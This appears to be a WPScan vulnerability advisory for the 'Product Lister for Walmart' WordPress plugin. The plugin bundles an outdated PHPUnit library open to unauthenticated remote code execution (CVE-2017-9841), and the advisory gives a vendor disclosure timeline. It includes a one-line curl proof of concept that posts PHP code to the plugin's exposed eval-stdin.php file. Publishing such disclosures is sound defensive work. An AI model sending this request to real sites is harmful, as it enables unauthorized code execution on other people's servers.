Product Lister for Walmart <= 1.0.0 - Unauthenticated RCE via Outdated PHPUnit



Description
The plugin uses an outdated PHPUnit library, which is known to be affected by an unauthenticated RCE issue.

February 28th, 2020 - Ticket sent to vendor via https://support.cedcommerce.com/open.php
March 6th, 2020 - Update requested to vendor (also realised that the ticket was closed w/o reason given)
March 12th, 2020 - Ticket closed again w/o explanation
March 12th, 2020 - Issue escalated to WP plugins team
March 18th, 2020 - WP Plugins Team investigating & plugin closed
March 25th, 2020 - Disclosure
Proof of Concept
curl -X POST --data "<?php echo php_uname(); ?>" http://example.com/wp-content/plugins/product-lister-walmart/marketplaces/walmart/lib/walmart-signature/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Affects Plugin

no known fix
- plugin closed

References

CVE 2017-9841
URL http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Views 1174
Verified Yes
WPVDB ID 10150

Timeline

Publicly Published 2020-03-25 (2 months ago)
Added 2020-03-25 (2 months ago)
Last Updated 2020-03-26 (2 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin